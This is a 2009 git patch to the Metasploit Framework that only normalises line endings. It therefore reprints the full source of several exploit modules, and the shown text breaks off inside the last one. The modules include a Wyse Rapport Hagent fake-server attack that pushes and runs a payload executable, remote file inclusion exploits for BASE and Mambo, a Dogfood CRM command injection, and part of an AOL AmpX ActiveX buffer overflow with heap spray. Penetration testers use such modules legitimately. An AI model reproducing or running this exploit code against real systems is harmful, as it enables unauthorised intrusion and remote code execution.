From 2570fcee157af2fac9eef93dc79c17384f1baf78 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 15 Dec 2009 18:47:29 +0000 Subject: [PATCH] get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da --- .../multi/wyse/hagent_untrusted_hsdata.rb | 472 ++++++------- .../exploits/unix/webapp/base_qry_common.rb | 142 ++-- .../unix/webapp/dogfood_spell_exec.rb | 192 +++--- .../exploits/unix/webapp/mambo_cache_lite.rb | 144 ++-- .../windows/browser/aol_ampx_convertfile.rb | 236 +++---- .../windows/browser/autodesk_idrop.rb | 262 ++++---- .../ebook_flipviewer_fviewerloading.rb | 226 +++---- .../windows/browser/ie_createobject.rb | 8 +- .../browser/ms_visual_studio_msmask.rb | 242 +++---- .../windows/browser/owc_spreadsheet_msdso.rb | 264 ++++---- .../windows/browser/roxio_cineplayer.rb | 218 +++--- .../browser/sapgui_saveviewtosessionfile.rb | 230 +++---- .../windows/browser/verypdf_pdfview.rb | 226 +++---- .../windows/browser/winzip_fileview.rb | 246 +++---- .../exploits/windows/ftp/dreamftp_format.rb | 166 ++--- .../windows/ftp/filecopa_list_overflow.rb | 108 +-- .../exploits/windows/games/mohaa_getinfo.rb | 192 +++--- .../windows/http/ca_igateway_debug.rb | 176 ++--- .../http/efs_easychatserver_username.rb | 178 ++--- .../windows/http/psoproxy91_overflow.rb | 174 ++--- .../lotus/domino_http_accept_language.rb | 320 ++++----- .../windows/misc/asus_dpcproxy_overflow.rb | 142 ++-- .../exploits/windows/misc/sap_2005_license.rb | 154 ++--- .../windows/misc/tiny_identd_overflow.rb | 142 ++-- .../windows/smb/smb2_negotiate_func_index.rb | 628 +++++++++--------- .../windows/telnet/gamsoft_telsrv_username.rb | 232 +++---- .../windows/tftp/dlink_long_filename.rb | 172 ++--- 27 files changed, 2949 insertions(+), 2943 deletions(-) diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index a69582e094..91c110441a 100644 
--- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb 
@@ -1,239 +1,239 @@ -## -# $Id: hagent_untrusted_hsdata.rb -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ -## - -require 'timeout' -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +## +# $Id: hagent_untrusted_hsdata.rb +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'timeout' +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::FtpServer - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution', - 'Description' => %q{ - This module exploits the Wyse Rapport Hagent service by pretending to - be a legitimate server. This process involves starting both HTTP and - FTP services on the attacker side, then contacting the Hagent service of - the target and indicating that an update is available. The target will - then download the payload wrapped in an executable from the FTP service. 
- }, - 'Stance' => Msf::Exploit::Stance::Aggressive, - 'Author' => 'kf', - 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '2009-0695'], - ['OSVDB', '55839'], - ['US-CERT-VU', '654545'], - ['URL', 'http://snosoft.blogspot.com/'], - ['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'], - ['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'], - ['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'], - ], - 'Payload' => - { - 'Space' => 2048, - 'BadChars' => '', - }, - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Targets' => - [ - [ 'Windows XPe x86',{'Platform' => 'win',}], - [ 'Wyse Linux x86', {'Platform' => 'linux',}], - ], - 'DefaultTarget' => 0, - 'Privileged' => true - )) - - register_options([ - OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]), - Opt::RPORT(80), - ], self.class) - end - - - def exploit - - if(datastore['SRVPORT'].to_i != 21) - print_error("This exploit requires the FTP service to run on port 21") - return - end - - # Connect to the target service - print_status("Connecting to the target") - connect() - - # Start the FTP service - print_status("Starting the FTP server") - start_service() - - # Create the executable with our payload - print_status("Generating the EXE") - if target['Platform'] == 'win' - @exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded) - maldir = "C:\\" # Windows - malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe" - co = "XP" - elsif target['Platform'] == 'linux' - @exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded) - maldir = "//tmp//" # Linux - malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin" - co = "LXS" - end - @exe_sent = false - - # Start the HTTP service - print_status("Starting the HTTP service") - wdmserver = Rex::Socket::TcpServer.create({ - 'Context' => { - 'Msf' => framework, - 'MsfExploit' => self - } - }) - - 
wdmserver_port = wdmserver.getsockname[2] - print_status("Starting the HTTP service on port #{wdmserver_port}") - - - fakerapport = Rex::Socket.source_address(rhost) - fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0] - mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|" - - # FTP Credentials - ftpserver = Rex::Socket.source_address(rhost) - ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1) - ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1) - ftpport = 21 - ftpsecure = '0' - - incr = 10 - pwn1 = - "&UP0|&SI=1|UR=9" + - "|CO \x0f#{co}\x0f|#{incr}" + - # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" + - "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" - - pwn2 = - "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" - - pwn3 = - "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # "|RB|#{incr+1}" + - # "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" + - #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # FTP Paramaters - "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" + - "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" + - # No clue - "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|" - - if target['Platform'] == 'win' - pwn = pwn1 + pwn3 - elsif target['Platform'] == 'linux' - pwn = pwn1 + pwn2 + pwn3 - end - # Send the malicious request - sock.put(mal) - - # Download some response data - resp = sock.get_once(-1, 10) - print_status("Received: " + resp) - - print_status("Waiting on a connection to the HTTP service") - begin - Timeout.timeout(190) do - done = false - while (not done and session = wdmserver.accept) - req = session.recvfrom(2000)[0] - next if not req - next if req.empty? 
- print_status("HTTP Request: #{req.split("\n")[0].strip}") - - case req - when /V01/ - print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)") - res = pwn - when /V02/ - print_status("++ device sending V02 query...") - res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|" - done = true - - when /V55/ - print_status("++ device sending V55 query...") - res = pwn - when /POST/ # PUT is used for non encrypted requests. - print_status("++ device sending V55 query...") - res = pwn - done = true - else - print_status("+++ sending generic response...") - res = pwn - end - - print_status("Sending reply: #{res}") - session.put(res) - session.close - end - end - rescue ::Timeout::Error - print_status("Timed out waiting on the HTTP request") - wdmserver.close - disconnect() - stop_service() - return - end - - print_status("Waiting on the FTP request...") - stime = Time.now.to_f - while(not @exe_sent) - break if (stime + 90 < Time.now.to_f) - select(nil, nil, nil, 0.25) - end - - if(not @exe_sent) - print_status("No executable sent :(") - end - - stop_service() - wdmserver.close() - - handler - disconnect - end - - def on_client_command_retr(c,arg) - print_status("#{@state[c][:name]} FTP download request for #{arg}") - conn = establish_data_connection(c) - if(not conn) - c.put("425 Can't build data connection\r\n") - return - end - - c.put("150 Opening BINARY mode data connection for #{arg}\r\n") - conn.put(@exe_file) - c.put("226 Transfer complete.\r\n") - conn.close - @exe_sent = true - end - - def on_client_command_size(c,arg) - print_status("#{@state[c][:name]} FTP size request for #{arg}") - c.put("213 #{@exe_file.length}\r\n") - end - - + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::FtpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution', + 'Description' => %q{ + This module exploits the Wyse Rapport Hagent 
service by pretending to + be a legitimate server. This process involves starting both HTTP and + FTP services on the attacker side, then contacting the Hagent service of + the target and indicating that an update is available. The target will + then download the payload wrapped in an executable from the FTP service. + }, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Author' => 'kf', + 'Version' => '$Revision$', + 'References' => + [ + ['CVE', '2009-0695'], + ['OSVDB', '55839'], + ['US-CERT-VU', '654545'], + ['URL', 'http://snosoft.blogspot.com/'], + ['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'], + ['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'], + ['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'], + ], + 'Payload' => + { + 'Space' => 2048, + 'BadChars' => '', + }, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Targets' => + [ + [ 'Windows XPe x86',{'Platform' => 'win',}], + [ 'Wyse Linux x86', {'Platform' => 'linux',}], + ], + 'DefaultTarget' => 0, + 'Privileged' => true + )) + + register_options([ + OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]), + Opt::RPORT(80), + ], self.class) + end + + + def exploit + + if(datastore['SRVPORT'].to_i != 21) + print_error("This exploit requires the FTP service to run on port 21") + return + end + + # Connect to the target service + print_status("Connecting to the target") + connect() + + # Start the FTP service + print_status("Starting the FTP server") + start_service() + + # Create the executable with our payload + print_status("Generating the EXE") + if target['Platform'] == 'win' + @exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded) + maldir = "C:\\" # Windows + malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe" + co = "XP" + elsif target['Platform'] == 'linux' + @exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded) + maldir = "//tmp//" 
# Linux + malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin" + co = "LXS" + end + @exe_sent = false + + # Start the HTTP service + print_status("Starting the HTTP service") + wdmserver = Rex::Socket::TcpServer.create({ + 'Context' => { + 'Msf' => framework, + 'MsfExploit' => self + } + }) + + wdmserver_port = wdmserver.getsockname[2] + print_status("Starting the HTTP service on port #{wdmserver_port}") + + + fakerapport = Rex::Socket.source_address(rhost) + fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0] + mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|" + + # FTP Credentials + ftpserver = Rex::Socket.source_address(rhost) + ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1) + ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1) + ftpport = 21 + ftpsecure = '0' + + incr = 10 + pwn1 = + "&UP0|&SI=1|UR=9" + + "|CO \x0f#{co}\x0f|#{incr}" + + # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" + + "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + + pwn2 = + "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" + + pwn3 = + "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + + # "|RB|#{incr+1}" + + # "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" + + #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + + # FTP Paramaters + "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" + + "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" + + # No clue + "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|" + + if target['Platform'] == 'win' + pwn = pwn1 + pwn3 + elsif target['Platform'] == 'linux' + pwn = pwn1 + pwn2 + pwn3 + end + # Send the malicious request + sock.put(mal) + + # Download some response data 
+ resp = sock.get_once(-1, 10) + print_status("Received: " + resp) + + print_status("Waiting on a connection to the HTTP service") + begin + Timeout.timeout(190) do + done = false + while (not done and session = wdmserver.accept) + req = session.recvfrom(2000)[0] + next if not req + next if req.empty? + print_status("HTTP Request: #{req.split("\n")[0].strip}") + + case req + when /V01/ + print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)") + res = pwn + when /V02/ + print_status("++ device sending V02 query...") + res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|" + done = true + + when /V55/ + print_status("++ device sending V55 query...") + res = pwn + when /POST/ # PUT is used for non encrypted requests. + print_status("++ device sending V55 query...") + res = pwn + done = true + else + print_status("+++ sending generic response...") + res = pwn + end + + print_status("Sending reply: #{res}") + session.put(res) + session.close + end + end + rescue ::Timeout::Error + print_status("Timed out waiting on the HTTP request") + wdmserver.close + disconnect() + stop_service() + return + end + + print_status("Waiting on the FTP request...") + stime = Time.now.to_f + while(not @exe_sent) + break if (stime + 90 < Time.now.to_f) + select(nil, nil, nil, 0.25) + end + + if(not @exe_sent) + print_status("No executable sent :(") + end + + stop_service() + wdmserver.close() + + handler + disconnect + end + + def on_client_command_retr(c,arg) + print_status("#{@state[c][:name]} FTP download request for #{arg}") + conn = establish_data_connection(c) + if(not conn) + c.put("425 Can't build data connection\r\n") + return + end + + c.put("150 Opening BINARY mode data connection for #{arg}\r\n") + conn.put(@exe_file) + c.put("226 Transfer complete.\r\n") + conn.close + @exe_sent = true + end + + def on_client_command_size(c,arg) + print_status("#{@state[c][:name]} FTP size request for #{arg}") + c.put("213 
#{@exe_file.length}\r\n") + end + + end diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index a27d285a2a..7900c80621 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb 
@@ -1,72 +1,72 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer::PHPInclude - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'BASE base_qry_common Remote File Include.', - 'Description' => %q{ - This module exploits a remote file inclusion vulnerability in - the base_qry_common.php file in BASE 1.2.4 and earlier. 
- }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2006-2685' ], - [ 'BID', '18298' ], - ], - 'Privileged' => false, - 'Payload' => - { - 'DisableNops' => true, - 'Compat' => - { - 'ConnectionType' => 'find', - }, - 'Space' => 32768, - }, - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], - 'DisclosureDate' => 'Jun 14 2008', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]), - ], self.class) - end - - def php_exploit - - timeout = 0.01 - uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) - print_status("Trying uri #{uri}") - - response = send_request_raw( { - 'global' => true, - 'uri' => uri, - },timeout) - - if response and response.code != 200 - print_error("Server returned non-200 status code (#{response.code})") - end - - handler - end - -end + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::PHPInclude + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BASE base_qry_common Remote File Include.', + 'Description' => %q{ + This module exploits a remote file inclusion vulnerability in + the base_qry_common.php file in BASE 1.2.4 and earlier. 
+ }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2006-2685' ], + [ 'BID', '18298' ], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + }, + 'Space' => 32768, + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Jun 14 2008', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]), + ], self.class) + end + + def php_exploit + + timeout = 0.01 + uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) + print_status("Trying uri #{uri}") + + response = send_request_raw( { + 'global' => true, + 'uri' => uri, + },timeout) + + if response and response.code != 200 + print_error("Server returned non-200 status code (#{response.code})") + end + + handler + end + +end diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 04e25a3702..0c7484921c 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb 
@@ -1,97 +1,97 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Exploit::Remote +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Dogfood CRM spell.php Remote Command Execution', - 'Description' => %q{ - This module exploits a previously unpublished vulnerability in the - Dogfood CRM mail function which is vulnerable to command injection - in the spell check feature. Because of character restrictions, this - exploit works best with the double-reverse telnet payload. This - vulnerability was discovered by LSO and affects v2.0.10. - }, - 'Author' => [ - 'LSO ', # Exploit module - 'patrick', # Added check code, QA tested ok 20090303, there are no references (yet). 
- ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'OSVDB', '54707' ], - [ "URL", "http://downloads.sourceforge.net/dogfood/" ], - ], - 'Privileged' => false, - 'Platform' => ['unix'], # patrickw - removed win, linux -> untested - 'Arch' => ARCH_CMD, - 'Payload' => - { - 'Space' => 1024, - 'DisableNops' => true, - 'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic perl ruby bash telnet', - } - }, - 'Targets' => [ ['Automatic', { }], ], - 'DefaultTarget' => 0 - )) - - register_options( - [ - OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']), - ], self.class) - - end - - def check - res = send_request_raw( - { - 'uri' => datastore['URIPATH'], - }, 1) - - if (res.body =~ /Spell Check complete/) - return Exploit::CheckCode::Detected - end - return Exploit::CheckCode::Safe - end - - def exploit - timeout = 1 - - cmd = payload.encoded - data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}" - uri = datastore['URIPATH'] - - response = send_request_cgi( - { - 'uri' => uri, - 'method' => "POST", - 'data' => data - }, - timeout) - - handler - end -end - + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Dogfood CRM spell.php Remote Command Execution', + 'Description' => %q{ + This module exploits a previously unpublished vulnerability in the + Dogfood CRM mail function which is vulnerable to command injection + in the spell check feature. Because of character restrictions, this + exploit works best with the double-reverse telnet payload. This + vulnerability was discovered by LSO and affects v2.0.10. + }, + 'Author' => [ + 'LSO ', # Exploit module + 'patrick', # Added check code, QA tested ok 20090303, there are no references (yet). 
+ ], + 'License' => BSD_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '54707' ], + [ "URL", "http://downloads.sourceforge.net/dogfood/" ], + ], + 'Privileged' => false, + 'Platform' => ['unix'], # patrickw - removed win, linux -> untested + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Space' => 1024, + 'DisableNops' => true, + 'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl ruby bash telnet', + } + }, + 'Targets' => [ ['Automatic', { }], ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']), + ], self.class) + + end + + def check + res = send_request_raw( + { + 'uri' => datastore['URIPATH'], + }, 1) + + if (res.body =~ /Spell Check complete/) + return Exploit::CheckCode::Detected + end + return Exploit::CheckCode::Safe + end + + def exploit + timeout = 1 + + cmd = payload.encoded + data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}" + uri = datastore['URIPATH'] + + response = send_request_cgi( + { + 'uri' => uri, + 'method' => "POST", + 'data' => data + }, + timeout) + + handler + end +end + diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index a8acdf9be4..a7c1c450f7 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb 
@@ -1,73 +1,73 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer::PHPInclude - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.', - 'Description' => %q{ - This module exploits a remote file inclusion vulnerability in - includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo - 4.6.4 and earlier. 
- }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-2905' ], - [ 'BID', '29716' ], - ], - 'Privileged' => false, - 'Payload' => - { - 'DisableNops' => true, - 'Compat' => - { - 'ConnectionType' => 'find', - }, - 'Space' => 32768, - }, - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], - 'DisclosureDate' => 'Jun 14 2008', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]), - ], self.class) - end - - def php_exploit - - timeout = 0.01 - uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) - print_status("Trying uri #{uri}") - - response = send_request_raw( { - 'global' => true, - 'uri' => uri, - },timeout) - - if response and response.code != 200 - print_error("Server returned non-200 status code (#{response.code})") - end - - handler - end - -end + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::PHPInclude + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.', + 'Description' => %q{ + This module exploits a remote file inclusion vulnerability in + includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo + 4.6.4 and earlier. 
+ }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2008-2905' ], + [ 'BID', '29716' ], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + }, + 'Space' => 32768, + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Jun 14 2008', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]), + ], self.class) + end + + def php_exploit + + timeout = 0.01 + uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) + print_status("Trying uri #{uri}") + + response = send_request_raw( { + 'global' => true, + 'uri' => uri, + },timeout) + + if response and response.code != 200 + print_error("Server returned non-200 status code (#{response.code})") + end + + handler + end + +end diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb index b4512f6362..252686706b 100644 --- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb +++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb 
@@ -1,121 +1,121 @@ -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow', - 'Description' => %q{ - This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX - class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website. - By setting an overly long value to 'ConvertFile()', an attacker can overrun - a buffer and execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'rgod ', # Original exploit [see References] - 'Trancer ' # Metasploit implementation - ], - 'Version' => '$Revision$', - 'References' => - [ + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX + class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website. + By setting an overly long value to 'ConvertFile()', an attacker can overrun + a buffer and execute arbitrary code. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'rgod ', # Original exploit [see References] + 'Trancer ' # Metasploit implementation + ], + 'Version' => '$Revision$', + 'References' => + [ [ 'OSVDB', '54706' ], - [ 'BID', '35028' ], - [ 'URL', 'http://www.milw0rm.com/exploits/8733' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00\x09\x0a\x0d'\\", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 250, 'Ret' => 0x0C0C0C0C } ] - ], - 'DisclosureDate' => 'May 19 2009', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Setup exploit buffers - nops = Rex::Text.to_unescape([target.ret].pack('V')) - ret = Rex::Text.uri_encode([target.ret].pack('L')) - blocksize = 0x40000 - fillto = 500 - offset = target['Offset'] - - # Randomize the javascript variable names - ampx = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) - j_nops = rand_text_alpha(rand(100) + 1) - j_headersize = rand_text_alpha(rand(100) + 1) - j_slackspace = 